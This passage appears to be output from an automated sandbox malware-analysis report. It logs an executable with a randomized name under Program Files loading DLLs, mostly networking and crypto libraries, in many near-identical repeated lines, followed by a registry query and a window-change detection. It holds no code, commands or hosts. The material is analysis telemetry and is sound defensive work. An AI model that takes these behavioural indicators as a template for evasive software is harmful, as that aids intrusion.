                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: profapi.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: amsi.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptdlg.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: msoert2.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: msimg32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptui.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: msasn1.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: msftedit.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: propsys.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\sihost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41fd88f7-f295-4d39-91ac-a85f3149a05b}\InProcServer32Jump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Windows\SysWOW64\msftedit.dll
                        Source: Window RecorderWindow detected: More than 3 window changes detected
